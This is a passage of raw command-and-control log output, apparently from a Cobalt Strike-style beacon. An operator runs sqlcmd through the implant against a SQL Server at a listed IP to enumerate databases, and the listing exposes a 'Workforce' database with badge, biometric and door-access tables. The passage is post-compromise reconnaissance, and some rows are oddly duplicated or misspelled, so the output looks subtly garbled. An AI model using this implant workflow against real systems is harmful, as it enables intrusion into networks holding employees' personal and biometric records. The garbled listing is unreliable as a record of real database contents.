WimanDB sys dm_os_memory_allocations VIEW NULL
WimanDB sys dm_os_memory_brokers VIEW NULL
WimanDB sys dm_os_memory_cache_clock_hands VIEW NULL
WimanDB sys dm_os_memory_cache_counters VIEW NULL
WimanDB sys dm_os_memory_cache_entries VIEW NULL
WimanDB sys dm_os_memory_cache_hash_tables VIEW NULL
WimanDB sys dm_os_memory_clerks VIEW NULL
WimanDB sys dm_os_memory_node_access_stats VIEW NULL
WimanDB sys dm_os_memory_nodes VIEW NULL
WimanDB sys dm_os_memory_objects VIEW NULL
WimanDB sys dm_os_memory_pools VIEW NULL
WimanDB sys dm_os_nodes VIEW NULL
WimanDB sys dm_os_performance_counters VIEW NULL
WimanDB sys dm_os_process_memory VIEW NULL
WimanDB sys dm_os_ring_buffers VIEW NULL
WimanDB sys dm_os_schedulers VIEW NULL
WimanDB sys dm_os_spinlock_stats VIEW NULL
WimanDB sys dm_os_stacks VIEW NULL
WimanDB sys dm_os_sublatches VIEW NULL
WimanDB sys dm_os_sys_info VIEW NULL
WimanDB sys dm_os_sys_memory VIEW NULL
WimanDB sys dm_os_tasks VIEW NULL
WimanDB sys dm_os_threads VIEW NULL
WimanDB sys dm_os_virtual_address_dump VIEW NULL
WimanDB sys dm_os_wait_stats VIEW NULL
WimanDB sys dm_os_waiting_tasks VIEW NULL
WimanDB sys dm_os_windows_info VIEW NULL
WimanDB sys dm_os_worker_local_storage VIEW NULL
WimanDB sys dm_os_workers VIEW NULL
WimanDB sys dm_qn_subscriptions VIEW NULL
WimanDB sys dm_repl_articles VIEW NULL
WimanDB sys dm_repl_schemas VIEW NULL
WimanDB sys dm_repl_tranhash VIEW NULL
WimanDB sys dm_repl_traninfo VIEW NULL
WimanDB sys dm_resource_governor_configuration VIEW NULL
WimanDB sys dm_resource_governor_resource_pools VIEW NULL
WimanDB sys dm_resource_governor_workload_groups VIEW NULL
WimanDB sys dm_server_audit_status VIEW NULL
WimanDB sys dm_server_memory_dumps VIEW NULL
WimanDB sys dm_server_registry VIEW NULL
WimanDB sys dm_server_services VIEW NULL
WimanDB sys dm_tran_active_snapshot_database_transactions VIEW NULL
WimanDB sys dm_tran_active_transactions VIEW NULL
WimanDB sys dm_tran_commit_table VIEW NULL
WimanDB sys dm_tran_current_snapshot VIEW NULL
WimanDB sys dm_tran_current_transaction VIEW NULL
WimanDB sys dm_tran_database_transactions VIEW NULL
WimanDB sys dm_tran_locks VIEW NULL
WimanDB sys dm_tran_session_transactions VIEW NULL
WimanDB sys dm_tran_top_version_generators VIEW NULL
WimanDB sys dm_tran_transactions_snapshot VIEW NULL
WimanDB sys dm_tran_version_store VIEW NULL
WimanDB sys dm_xe_map_values VIEW NULL
WimanDB sys dm_xe_object_columns VIEW NULL
WimanDB sys dm_xe_objects VIEW NULL
WimanDB sys dm_xe_packages VIEW NULL
WimanDB sys dm_xe_session_event_actions VIEW NULL
WimanDB sys dm_xe_session_events VIEW NULL
WimanDB sys dm_xe_session_object_columns VIEW NULL
WimanDB sys dm_xe_session_targets VIEW NULL
WimanDB sys dm_xe_sessions VIEW NULL
WimanDB sys endpoint_webmethods VIEW NULL
WimanDB sys endpoints VIEW NULL
WimanDB sys event_notification_event_types VIEW NULL
WimanDB sys event_notifications VIEW NULL
WimanDB sys events VIEW NULL
WimanDB sys extended_procedures VIEW NULL
WimanDB sys extended_properties VIEW NULL
WimanDB sys filegroups VIEW NULL
WimanDB sys foreign_key_columns VIEW NULL
WimanDB sys foreign_keys VIEW NULL
WimanDB sys fulltext_catalogs VIEW NULL
WimanDB sys fulltext_document_types VIEW NULL
WimanDB sys fulltext_index_catalog_usages VIEW NULL
WimanDB sys fulltext_index_columns VIEW NULL
WimanDB sys fulltext_index_fragments VIEW NULL
WimanDB sys fulltext_index_indexes VIEW NULL
WimanDB sys fulltext_languages VIEW NULL
WimanDB sys fulltext_stoplists VIEW NULL
WimanDB sys fulltext_stopwords VIEW NULL
WimanDB sys fulltext_system_stopwords VIEW NULL
WimanDB sys function_order_columns VIEW NULL
WimanDB sys http_endpoints VIEW NULL
WimanDB sys identity_columns VIEW NULL
WimanDB sys index_columns VIEW NULL
WimanDB sys indexes VIEW NULL
WimanDB sys internal_tables VIEW NULL
WimanDB sys key_constraints VIEW NULL
WimanDB sys key_encryptions VIEW NULL
WimanDB sys linked_logins VIEW NULL
WimanDB sys login_token VIEW NULL
WimanDB sys master_files VIEW NULL
WimanDB sys master_key_passwords VIEW NULL
WimanDB sys message_type_xml_schema_collection_usages VIEW NULL
WimanDB sys messages VIEW NULL
WimanDB sys module_assembly_usages VIEW NULL
WimanDB sys numbered_procedure_parameters VIEW NULL
WimanDB sys numbered_procedures VIEW NULL
WimanDB sys objects VIEW NULL
WimanDB sys openkeys VIEW NULL
WimanDB sys parameter_type_usages VIEW NULL
WimanDB sys parameter_xml_schema_collection_usages VIEW NULL
WimanDB sys parameters VIEW NULL
WimanDB sys partition_functions VIEW NULL
WimanDB sys partition_parameters VIEW NULL
WimanDB sys partition_range_values VIEW NULL
WimanDB sys partition_schemes VIEW NULL
WimanDB sys partitions VIEW NULL
WimanDB sys plan_guides VIEW NULL
WimanDB sys procedures VIEW NULL
WimanDB sys remote_logins VIEW NULL
WimanDB sys remote_service_bindings VIEW NULL
WimanDB sys resource_governor_configuration VIEW NULL
WimanDB sys resource_governor_resource_pools VIEW NULL
WimanDB sys resource_governor_workload_groups VIEW NULL
WimanDB sys routes VIEW NULL
WimanDB sys schemas VIEW NULL
WimanDB sys securable_classes VIEW NULL
WimanDB sys server_assembly_modules VIEW NULL
WimanDB sys server_audit_specification_details VIEW NULL
WimanDB sys server_audit_specifications VIEW NULL
WimanDB sys server_audits VIEW NULL
WimanDB sys server_event_notifications VIEW NULL
WimanDB sys server_event_session_actions VIEW NULL
WimanDB sys server_event_session_events VIEW NULL
WimanDB sys server_event_session_fields VIEW NULL
WimanDB sys server_event_session_targets VIEW NULL
WimanDB sys server_event_sessions VIEW NULL
WimanDB sys server_events VIEW NULL
WimanDB sys server_file_audits VIEW NULL
WimanDB sys server_permissions VIEW NULL
WimanDB sys server_principal_credentials VIEW NULL
WimanDB sys server_principals VIEW NULL
WimanDB sys server_role_members VIEW NULL
WimanDB sys server_sql_modules VIEW NULL
WimanDB sys server_trigger_events VIEW NULL
WimanDB sys server_triggers VIEW NULL
WimanDB sys servers VIEW NULL
WimanDB sys service_broker_endpoints VIEW NULL
WimanDB sys service_contract_message_usages VIEW NULL
WimanDB sys service_contract_usages VIEW NULL
WimanDB sys service_contracts VIEW NULL
WimanDB sys service_message_types VIEW NULL
WimanDB sys service_queue_usages VIEW NULL
WimanDB sys service_queues VIEW NULL
WimanDB sys services VIEW NULL
WimanDB sys soap_endpoints VIEW NULL
WimanDB sys spatial_index_tessellations VIEW NULL
WimanDB sys spatial_indexes VIEW NULL
WimanDB sys spatial_reference_systems VIEW NULL
WimanDB sys sql_dependencies VIEW NULL
WimanDB sys sql_expression_dependencies VIEW NULL
WimanDB sys sql_logins VIEW NULL
WimanDB sys sql_modules VIEW NULL
WimanDB sys stats VIEW NULL
WimanDB sys stats_columns VIEW NULL
WimanDB sys symmetric_keys VIEW NULL
WimanDB sys synonyms VIEW NULL
WimanDB sys sysaltfiles VIEW NULL
WimanDB sys syscacheobjects VIEW NULL
WimanDB sys syscharsets VIEW NULL
WimanDB sys syscolumns VIEW NULL
WimanDB syscomments VIEW NULL
WimanDB sysconfigures VIEW NULL
WimanDB sysconstraints VIEW NULL
WimanDB sys syscurconfigs VIEW NULL
WimanDB sys syscursorcolumns VIEW NULL
WimanDB sys syscursorrefs VIEW NULL
WimanDB sys syscursors VIEW NULL
WimanDB sys syscursortables VIEW NULL
WimanDB sysdatabases VIEW NULL
WimanDB sysdepends VIEW NULL
WimanDB sys sysdevices VIEW NULL
WimanDB sys sysfilegroups VIEW NULL
WimanDB sys sysfiles VIEW NULL
WimanDB sys sysforeignkeys VIEW NULL
WimanDB sys sysfulltextcatalogs VIEW NULL
WimanDB sys sysindexes VIEW NULL
WimanDB sys sysindexkeys VIEW NULL
WimanDB sys syslanguages VIEW NULL
WimanDB sys syslockinfo VIEW NULL
WimanDB sys syslogins VIEW NULL
WimanDB sys sysmembers VIEW NULL
WimanDB sys sysmessages VIEW NULL
WimanDB sys sysobjects VIEW NULL
WimanDB sys sysoledbusers VIEW NULL
WimanDB sys sysopentapes VIEW NULL
WimanDB sys sysperfinfo VIEW NULL
WimanDB sys syspermissions VIEW NULL
WimanDB sys sysprocesses VIEW NULL
WimanDB sys sysprotects VIEW NULL
WimanDB sys sysreferences VIEW NULL
WimanDB sys sysremotelogins VIEW NULL
WimanDB syss sysservers VIEW NULL
WimanDB sys system_columns VIEW NULL
WimanDB sys system_components_surface_area_configuration VIEW NULL
WimanDB sys system_internals_allocation_units VIEW NULL
WimanDB sys system_internals_partition_columns VIEW NULL
WimanDB sys system_internals_partitions VIEW NULL
WimanDB sys system_objects VIEW NULL
WimanDB sys system_parameters VIEW NULL
WimanDB sys system_sql_modules VIEW NULL
WimanDB sys system_views VIEW NULL
WimanDB sys systypes VIEW NULL
WimanDB sys sysusers VIEW NULL
WimanDB sys table_types VIEW NULL
WimanDB sys tables VIEW NULL
WimanDB sys tcp_endpoints VIEW NULL
WimanDB sys trace_categories VIEW NULL
WimanDB sys trace_columns VIEW NULL
WimanDB sys trace_event_bindings VIEW NULL
WimanDB sys trace_events VIEW NULL
WimanDB sys trace_subclass_values VIEW NULL
WimanDB sys traces VIEW NULL
WimanDB sys transmission_queue VIEW NULL
WimanDB sys trigger_event_types VIEW NULL
WimanDB sys trigger_events VIEW NULL
WimanDB sys triggers VIEW NULL
WimanDB sys type_assembly_usages VIEW NULL
WimanDB sys types VIEW NULL
WimanDB sys user_token VIEW NULL
WimanDB sys via_endpoints VIEW NULL
WimanDB sys views VIEW NULL
WimanDB sys xml_indexes VIEW NULL
WimanDB sys xml_schema_attributes VIEW NULL
WimanDB sys xml_schema_collections VIEW NULL
WimanDB sys xml_schema_component_placements VIEW NULL
WimanDB sys xml_schema_components VIEW NULL
WimanDB sys xml_schema_elements VIEW NULL
WimanDB sys xml_schema_facets VIEW NULL
WimanDB sys xml_schema_model_groups VIEW NULL
WimanDB sys xml_schema_namespaces VIEW NULL
WimanDB sys xml_schema_types VIEW NULL
WimanDB sys xml_schema_wildcard_namespaces VIEW NULL
WimanDB sys xml_schema_wildcards VIEW NULL

(383 rows affected)
```
 
```
beacon> shell sqlcmd -S 89.0.0.121,1433 -E -Q "use Workforce; exec sp_tables" -W
[*] Tasked beacon to run: sqlcmd -S 89.0.0.121,1433 -E -Q "use Workforce; exec sp_tables" -W
[+] host called home, sent: 97 bytes
[+] received output:
Changed database context to 'Workforce'.
TABLE_QUALIFIER TABLE_OWNER TABLE_NAME TABLE_TYPE
--------------- ----------- ---------- ---------- -------
Workforce dbo BADGEASSIGN TABLE NULL
Workforce dbo CUSTOMDATADEF TABLE NULL
Workforce dbo HOLIDAY TABLE NULL
Workforce dbo HOLIDAYDATE TABLE NULL
Workforce dbo KCSSTAGE TABLE NULL
Workforce dbo LABORLEVELDEF TABLE NULL
Workforce dbo MMH_ApplicationComponent TABLE NULL
Workforce dbo MMH_ApplicationComponentType TABLE NULL
Workforce dbo dbo MMH_ApplicationMenu TABLE NULL
Workforce dbo MMHGALERTPROFDETAIL TABLE NULL
Workforce dbo dbo MMHGALERTPROFILES TABLE NULL
Workforce dbo MMHGALERTRESPONSE TABLE NULL
Workforce dbo MMHGALERTRESPONSEFAILURES TABLE NULL
Workforce dbo MMHGALERTS TABLE NULL
Workforce dbo MMHGBADGECONFIG TABLE NULL
Workforce dbo MMHGDBCHANGES TABLE NULL
Workforce dbo MMHGDEVCLOSESCHED TABLE NULL
Workforce dbo MMHGDEVCLOSESCHEDTEMP TABLE NULL
Workforce dbo MMHGDEVICE TABLE NULL
Workforce dbo MMHGDEVICEDETAIL TABLE NULL
Workforce dbo MMHGDDEVICEGROUP TABLE NULL
Workforce dbo MMHGDEVICEGROUPDETAIL TABLE NULL
Workforce dbo MMHGDEVICEMONITOR TABLE NULL
Workforce dbo MMHGDEVICESCHEDULE TABLE NULL
Workforce dbo MMHGDEVICESCHEDULETEMP TABLE NULL
Workforce dbo MMHGDEVOPENSCHED TABLE NULL
Workforce dbo MMHGDEVOPENSCHEDTEMP TABLE NULL
Workforce dbo MMHGEMPGROUPDETAIL TABLE NULL
Workforce dbo MMHGEMPGROUPS TABLE NULL
Workforce dbo MMHGFLOWCONTROL TABLE NULL
Workforce dbo MMHGFLOWCONTROLDETAIL TABLE NULL
Workforce dbo dbo MMHGLOBALS TABLE NULL
Workforce dbo MMHGHOLIDAYPROFILES TABLE NULL
Workforce dbo MMHGHOLIDAYS TABLE NULL
Workforce dbo MMHGHOLPROFDETAILS TABLE NULL
Workforce dbo MMHGIBCBADGELAYOUT TABLE NULL
Workforce dbo MMHGIBCBARCODE TABLE NULL
Workforce dbo MMHGIBCMAGNETIC TABLE NULL
Workforce dbo MMHGIBCPROX TABLE NULL
Workforce dbo MMHGIBCPROXDETAIL TABLE NULL
Workforce dbo MMHGIMPORTMAP TABLE NULL
Workforce dbo MMHGKRONBIOENROLLED TABLE NULL
Workforce dbo MMHGKRONONPREMISES TABLE NULL
Workforce dbo MMHGKRONOSBIOTEMPLATE TABLE NULL
Workforce dbo MMHGKRONOSDEF TABLE NULL
Workforce dbo MMHGKRONOSDEFTYPE TABLE NULL
Workforce dbo MMHGKRONOSVALUES TABLE NULL
Workforce dbo MMHGLICENSE TABLE NULL
Workforce dbo MMHGMAPVALUES TABLE NULL
Workforce dbo MMHGMAXDAYPUNCH TABLE NULL
Workforce dbo MMHGMAXTOTPUNCH TABLE NULL
Workforce dbo MMHGMUSTER TABLE NULL
Workforce dbo MMHGOFFDAYS TABLE NULL
Workforce dbo MMHGPERSON TABLE NULL
Workforce dbo MMHGPERSONACCESS TABLE NULL
Workforce dbo MMHGPERSONDEVICE TABLE NULL
Workforce dbo MMHGPERSONFLOWCONTROL TABLE NULL
Workforce dbo MMHGPERSONTEMPLATES TABLE NULL
Workforce dbo MMHGPFCDETAIL TABLE NULL
Workforce dbo MMHGPICKLISTENTRIES TABLE NULL
Workforce dbo dbo MMHGPICKLISTITEMS TABLE NULL
Workforce dbo dbo MMHGPROCESSCONTROL TABLE NULL
Workforce dbo MMHGPROCESSCRITERIA TABLE NULL
Workforce dbo MMHGPROCESSTYPES TABLE NULL
Workforce dbo MMHGQUERIES TABLE NULL
Workforce dbo MMHGREMFROMDEVICE TABLE NULL
Workforce dbo MMHGREPORTCATEGORY TABLE NULL
Workforce dbo MMHGREPORTPROCESS TABLE NULL
Workforce dbo MMHGREPORTS TABLE NULL
Workforce dbo MMHGSCHEDULE TABLE NULL
Workforce dbo MMHGSCHEDULEDETAIL TABLE NULL
Workforce dbo MMHGSCHEDULETASKS TABLE NULL
Workforce dbo MMHGSECONDARYDB TABLE NULL
Workforce dbo MMHGSHIFTS TABLE NULL
Workforce dbo MMHGSHIFTSTEMP TABLE NULL
Workforce dbo MMHGSWIPEINFO TABLE NULL
Workforce dbo MMHGSWIPEINFOARCHIVE TABLE NULL
Workforce dbo MMHGTIMEZONE TABLE NULL
Workforce dbo MMHGUSERACCESS TABLE NULL
Workforce dbo MMHGZONE TABLE NULL
Workforce dbo MMHGZONEDETAIL TABLE NULL
Workforce dbo PERSONCSTMDATA TABLE NULL
Workforce dbo VP_PERSONV42 TABLE NULL
Workforce dbo VP_TOTALS TABLE NULL
Workforce dbo MMHGv_AlertResponseUnion VIEW NULL
Workforce dbo MMHGv_LLCDNamesLinear VIEW NULL
Workforce dbo MMHGv_RPTBiometric VIEW NULL
Workforce dbo MMHGv_RptDeviceSetup VIEW NULL
Workforce dbo MMHGv_RptDoorAssign VIEW NULL
Workforce dbo MMHGv_RPTMuster VIEW NULL
Workforce dbo MMHGv_SWIPEINFO VIEW NULL
Workforce INFORMATION_SCHEMA CHECK_CONSTRAINTS VIEW NULL
Workforce INFORMATION_SCHEMA COLUMN_DOMAIN_USAGE VIEW NULL
Workforce INFORMATION_SCHEMA COLUMN_PRIVILEGES VIEW NULL
Workforce INFORMATION_SCHEMA COLUMNS VIEW NULL
Workforce INFORMATION_SCHEMA CONSTRAINT_COLUMN_USAGE VIEW NULL
Workforce INFORMATION_SCHEMA CONSTRAINT_TABLE_USAGE VIEW NULL
Workforce INFORMATION_SCHEMA DOMAIN_CONSTRAINTS VIEW NULL
Workforce INFORMATION_SCHEMA DOMAINS VIEW NULL
Workforce INFORMATION_SCHEMA KEY_COLUMN_USAGE VIEW NULL
Workforce INFORMATION_SCHEMA PARAMETERS VIEW NULL
Workforce INFORMATION_SCHEMA REFERENTIAL_CONSTRAINTS VIEW NULL
Workforce INFORMATION_SCHEMA ROUTINE_COLUMNS VIEW NULL
Workforce INFORMATION_SCHEMA ROUTINES VIEW NULL
Workforce INFORMATION_SCHEMA SCHEMATA VIEW NULL
Workforce INFORMATION_SCHEMA TABLE_CONSTRAINTS VIEW NULL
Workforce INFORMATION_SCHEMA TABLE_PRIVILEGES VIEW NULL
Workforce INFORMATION_SCHEMA TABLES VIEW NULL
Workforce INFORMATION_SCHEMA VIEW_COLUMN_USAGE VIEW NULL
Workforce INFORMATION_SCHEMA VIEW_TABLE_USAGE VIEW NULL
Workforce INFORMATION_SCHEMA VIEWS VIEW NULL
Workforce sys all_columns VIEW NULL
Workforce sys all_objects VIEW NULL
Workforce sys all_parameters VIEW NULL
Workforce sys all_sql_modules VIEW NULL
Workforce sys all_views VIEW NULL
Workforce sys allocation_units VIEW NULL
Workforce sys assemblies VIEW NULL
Workforce sys assembly_files VIEW NULL
Workforce sys assembly_modules VIEW NULL
Workforce sys assembly_references VIEW NULL
Workforce sys assembly_types VIEW NULL
Workforce sys asymmetric_keys VIEW NULL
Workforce sys backup_devices VIEW NULL
Workforce sys certificates VIEW NULL
Workforce sys change_tracking_databases VIEW NULL
Workforce sys change_tracking_tables VIEW NULL
Workforce sys check_constraints VIEW NULL
Workforce sys column_type_usages VIEW NULL
Workforce sys column_xml_schema_collection_usages VIEW NULL
Workforce sys columns VIEW NULL
Workforce sys computed_columns VIEW NULL
Workforce sys configurations VIEW NULL
Workforce sys conversation_endpoints VIEW NULL
Workforce sys conversation_groups VIEW NULL
Workforce sys conversation_priorities VIEW NULL
Workforce sys credentials VIEW NULL
Workforce sys crypt_properties VIEW NULL
Workforce sys cryptographic_providers VIEW NULL
Workforce sys data_spaces VIEW NULL
Workforce sys database_audit_specification_details VIEW NULL
Workforce sys database_audit_specifications VIEW NULL
Workforce sys database_files VIEW NULL
Workforce sys database_mirroring VIEW NULL
Workforce sys database_mirroring_endpoints VIEW NULL
Workforce sys database_mirroring_witnesses VIEW NULL
Workforce sys database_permissions VIEW NULL
Workforce sys database_principal_aliases VIEW NULL
Workforce sys database_principals VIEW NULL
Workforce sys database_recovery_status VIEW NULL
Workforce sys database_role_members VIEW NULL
Workforce sys databases VIEW NULL
Workforce sys default_constraints VIEW NULL
Workforce sys destination_data_spaces VIEW NULL
Workforce sys dm_audit_actions VIEW NULL
Workforce sys dm_audit_class_type_map VIEW NULL
Workforce sys dm_broker_activated_tasks VIEW NULL
Workforce sys dm_broker_connections VIEW NULL
Workforce sys dm_broker_forwarded_messages VIEW NULL
Workforce sys dm_broker_queue_monitors VIEW NULL
Workforce sys dm_cdc_errors VIEW NULL
Workforce sys dm_cdc_log_scan_sessions VIEW NULL
Workforce sys dm_clr_appdomains VIEW NULL
Workforce sys dm_clr_loaded_assemblies VIEW NULL
Workforce sys dm_clr_properties VIEW NULL
Workforce sys dm_clr_tasks VIEW NULL
Workforce sys dm_cryptographic_provider_properties VIEW NULL
Workforce sys dm_database_encryption_keys VIEW NULL
Workforce sys dm_db_file_space_usage VIEW NULL
Workforce sys dm_db_index_usage_stats VIEW NULL
Workforce sys dm_db_mirroring_auto_page_repair VIEW NULL
Workforce sys dm_db_mirroring_connections VIEW NULL
Workforce sys dm_db_mirroring_past_actions VIEW NULL
Workforce sys dm_db_missing_index_details VIEW NULL
Workforce sys dm_db_missing_index_group_stats VIEW NULL
Workforce sys dm_db_missing_index_groups VIEW NULL
Workforce sys dm_db_partition_stats VIEW NULL
Workforce sys dm_db_persisted_sku_features VIEW NULL
Workforce sys dm_db_script_level VIEW NULL
Workforce sys dm_db_session_space_usage VIEW NULL
Workforce sys dm_db_task_space_usage VIEW NULL
Workforce sys dm_exec_background_job_queue VIEW NULL
Workforce sys dm_exec_background_job_queue_stats VIEW NULL
Workforce sys dm_exec_cached_plans VIEW NULL
Workforce sys dm_exec_connections VIEW NULL
Workforce sys dm_exec_procedure_stats VIEW NULL
Workforce sys dm_exec_query_memory_grants VIEW NULL
Workforce sys dm_exec_query_optimizer_info VIEW NULL
Workforce sys dm_exec_query_resource_semaphores VIEW NULL
Workforce sys dm_exec_query_stats VIEW NULL
Workforce sys dm_exec_query_transformation_stats VIEW NULL
Workforce sys dm_exec_requests VIEW NULL
Workforce sys dm_exec_sessions VIEW NULL
Workforce sys dm_exec_trigger_stats VIEW NULL
Workforce sys dm_filestream_file_io_handles VIEW NULL
Workforce sys dm_filestream_file_io_requests VIEW NULL
Workforce sys dm_fts_active_catalogs VIEW NULL
Workforce sys dm_fts_fdhosts VIEW NULL
Workforce sys dm_fts_index_population VIEW NULL
Workforce sys dm_fts_memory_buffers VIEW NULL
Workforce sys dm_fts_memory_pools VIEW NULL
Workforce sys dm_fts_outstanding_batches VIEW NULL
Workforce sys dm_fts_population_ranges VIEW NULL
Workforce sys dm_io_backup_tapes VIEW NULL
Workforce sys dm_io_cluster_shared_drives VIEW NULL
Workforce sys dm_io_pending_io_requests VIEW NULL
Workforce sys dm_os_buffer_descriptors VIEW NULL
Workforce sys dm_os_child_instances VIEW NULL
Workforce sys dm_os_cluster_nodes VIEW NULL
Workforce sys dm_os_dispatcher_pools VIEW NULL
Workforce sys dm_os_dispatchers VIEW NULL
Workforce sys dm_os_hosts VIEW NULL
Workforce sys dm_os_latch_stats VIEW NULL
Workforce sys dm_os_loaded_modules VIEW NULL
Workforce sys dm_os_memory_allocations VIEW NULL
Workforce sys dm_os_memory_brokers VIEW NULL
Workforce sys dm_os_memory_cache_clock_hands VIEW NULL
Workforce sys dm_os_memory_cache_counters VIEW NULL
Workforce sys dm_os_memory_cache_entries VIEW NULL
Workforce sys dm_os_memory_cache_hash_tables VIEW NULL
Workforce sys dm_os_memory_clerks VIEW NULL
Workforce sys dm_os_memory_node_access_stats VIEW NULL
Workforce sys dm_os_memory_nodes VIEW NULL
Workforce sys dm_os_memory_objects VIEW NULL
Workforce sys dm_os_memory_pools VIEW NULL
Workforce sys dm_os_nodes VIEW NULL
Workforce sys dm_os_performance_counters VIEW NULL
Workforce sys dm_os_process_memory VIEW NULL
Workforce sys dm_os_ring_buffers VIEW NULL
Workforce sys dm_os_schedulers VIEW NULL
Workforce sys dm_os_spinlock_stats VIEW NULL
Workforce sys dm_os_stacks VIEW NULL
Workforce sys dm_os_sublatches VIEW NULL
Workforce sys dm_os_sys_info VIEW NULL
Workforce sys dm_os_sys_memory VIEW NULL
Workforce sys dm_os_tasks VIEW NULL
Workforce sys dm_os_threads VIEW NULL
Workforce sys dm_os_virtual_address_dump VIEW NULL
Workforce sys dm_os_wait_stats VIEW NULL
Workforce sys dm_os_waiting_tasks VIEW NULL
Workforce sys dm_os_windows_info VIEW NULL
Workforce sys dm_os_worker_local_storage VIEW NULL
Workforce sys dm_os_workers VIEW NULL
Workforce sys dm_qn_subscriptions VIEW NULL
Workforce sys dm_repl_articles VIEW NULL
Workforce sys dm_repl_schemas VIEW NULL
Workforce sys dm_repl_tranhash VIEW NULL
Workforce sys dm_repl_traninfo VIEW NULL
Workforce sys dm_resource_governor_configuration VIEW NULL
Workforce sys dm_resource_governor_resource_pools VIEW NULL
Workforce sys dm_resource_governor_workload_groups VIEW NULL
Workforce sys dm_server_audit_status VIEW NULL
Workforce sys dm_server_memory_dumps VIEW NULL
Workforce sys dm_server_registry VIEW NULL
Workforce sys dm_server_services VIEW NULL
Workforce sys dm_tran_active_snapshot_database_transactions VIEW NULL
Workforce sys dm_tran_active_transactions VIEW NULL
Workforce sys dm_tran_commit_table VIEW NULL
Workforce sys dm_tran_current_snapshot VIEW NULL
Workforce sys dm_an_tran_current_transaction VIEW NULL
Workforce sys dm_tran_database_transactions VIEW NULL
Workforce sys dm_tran_locks VIEW NULL
Workforce sys dm_tran_session_transactions VIEW NULL
Workforce sys dm_tran_top_version_generators VIEW NULL
Workforce sys dm_tran_transactions_snapshot VIEW NULL
Workforce sys dm_tran_version_store VIEW NULL
Workforce sys dm_xe_map_values VIEW NULL
Workforce sys dm_xe_object_columns VIEW NULL
Workforce sys dm_xe_objects VIEW NULL
Workforce sys dm_xe_packages VIEW NULL
Workforce sys dm_xe_session_event_actions VIEW NULL
Workforce sys dm_xe_session_events VIEW NULL
Workforce sys dm_xe_session_object_columns VIEW NULL
Workforce sys dm_xe_session_targets VIEW NULL
Workforce sys dm_xe_sessions VIEW NULL
Workforce sys endpoint_webmethods VIEW NULL
Workforce sys endpoints VIEW NULL
Workforce sys event_notification_event_types VIEW NULL
Workforce sys event_notifications VIEW NULL
Workforce sys events VIEW NULL
Workforce sys extended_procedures VIEW NULL
Workforce sys extended_properties VIEW NULL
Workforce sys filegroups VIEW NULL
Workforce sys foreign_key_columns VIEW NULL
Workforce sys foreign_keys VIEW NULL
Workforce sys fulltext_catalogs VIEW NULL
Workforce sys fulltext_document_types VIEW NULL
Workforce sys fulltext_index_catalog_usages VIEW NULL
Workforce sys fulltext_index_columns VIEW NULL
Workforce sys fulltext_index_fragments VIEW NULL
Workforce sys fulltext_index_indexes VIEW NULL
Workforce sys fulltext_languages VIEW NULL
Workforce sys fulltext_stoplists VIEW NULL
Workforce sys fulltext_stopwords VIEW NULL
Workforce sys fulltext_system_stopwords VIEW NULL
Workforce sys function_order_columns VIEW NULL
Workforce sys http_endpoints VIEW NULL
Workforce sys identity_columns VIEW NULL
Workforce sys index_columns VIEW NULL
Workforce sys indexes VIEW NULL
Workforce sys internal_tables VIEW NULL
Workforce sys key_constraints VIEW NULL
Workforce sys key_encryptions VIEW NULL
Workforce sys linked_logins VIEW NULL
Workforce sys login_token VIEW NULL
Workforce sys master_files VIEW NULL
Workforce sys master_key_passwords VIEW NULL
Workforce sys message_type_xml_schema_collection_usages VIEW NULL
Workforce sys messages VIEW NULL
Workforce sys module_assembly_usages VIEW NULL
Workforce sys numbered_procedure_parameters VIEW NULL
Workforce sys numbered_procedures VIEW NULL
Workforce sys objects VIEW NULL
Workforce sys openkeys VIEW NULL
Workforce sys parameter_type_usages VIEW NULL
Workforce sys parameter_xml_schema_collection_usages VIEW NULL
Workforce sys parameters VIEW NULL
Workforce sys partition_functions VIEW NULL
Workforce sys partition_parameters VIEW NULL
Workforce sys partition_range_values VIEW NULL
Workforce sys partition_schemes VIEW NULL
Workforce sys partitions VIEW NULL
Workforce sys plan_guides VIEW NULL
Workforce sys procedures VIEW NULL
Workforce sys remote_logins VIEW NULL
Workforce sys remote_service_bindings VIEW NULL
Workforce sys resource_governor_configuration VIEW NULL
Workforce sys resource_governor_resource_pools VIEW NULL
Workforce sys resource_governor_workload_groups VIEW NULL
Workforce sys routes VIEW NULL
Workforce sys schemas VIEW NULL
Workforce sys securable_classes VIEW NULL
Workforce sys server_assembly_modules VIEW NULL
Workforce sys server_audit_specification_details VIEW NULL
Workforce sys server_audit_specifications VIEW NULL
Workforce sys server_audits VIEW NULL
Workforce sys server_event_notifications VIEW NULL
Workforce sys server_event_session_actions VIEW NULL
Workforce sys server_event_session_events VIEW NULL
Workforce sys server_event_session_fields VIEW NULL
Workforce sys server_event_session_targets VIEW NULL
Workforce sys server_event_sessions VIEW NULL
Workforce sys server_events VIEW NULL
Workforce sys server_file_audits VIEW NULL
Workforce sys server_permissions VIEW NULL
Workforce sys server_principal_credentials VIEW NULL
Workforce sys server_principals VIEW NULL
Workforce sys server_role_members VIEW NULL
Workforce sys server_sql_modules VIEW NULL
Workforce sys server_trigger_events VIEW NULL
Workforce sys server_triggers VIEW NULL
Workforce sys servers VIEW NULL
Workforce sys service_broker_endpoints VIEW NULL
Workforce sys service_contract_message_usages VIEW NULL
Workforce sys service_contract_usages VIEW NULL
Workforce sys service_contracts VIEW NULL
Workforce sys service_message_types VIEW NULL
Workforce sys service_queue_usages VIEW NULL
Workforce sys service_queues VIEW NULL
Workforce sys services VIEW NULL
Workforce sys soap_endpoints VIEW NULL
Workforce sys spatial_index_tessellations VIEW NULL
Workforce sys spatial_indexes VIEW NULL
Workforce sys spatial_reference_systems VIEW NULL
Workforce sys sql_dependencies VIEW NULL
Workforce sys sql_expression_dependencies VIEW NULL
Workforce sys sql_logins VIEW NULL
Workforce sys sql_modules VIEW NULL
Workforce sys stats VIEW NULL
Workforce sys stats_columns VIEW NULL
Workforce sys symmetric_keys VIEW NULL
Workforce sys synonyms VIEW NULL
Workforce sys sysaltfiles VIEW NULL
Workforce sys syscacheobjects VIEW NULL
Workforce sys syscharsets VIEW NULL
Workforce sys syscolumns VIEW NULL
Workforce sys syscomments VIEW NULL
Workforce sysconfigures VIEW NULL
Workforce sys sysconstraints VIEW NULL
Workforce sys syscurconfigs VIEW NULL
Workforce sys syscursorcolumns VIEW NULL
Workforce sys syscursorrefs VIEW NULL
Workforce sys syscursors VIEW NULL
Workforce sys syscursortables VIEW NULL
Workforce sys sysdatabases VIEW NULL
Workforce sysdepends VIEW NULL
Workforce sys sysdevices VIEW NULL
Workforce sys sysfilegroups VIEW NULL
Workforce sys sysfiles VIEW NULL
Workforce sys sysforeignkeys VIEW NULL
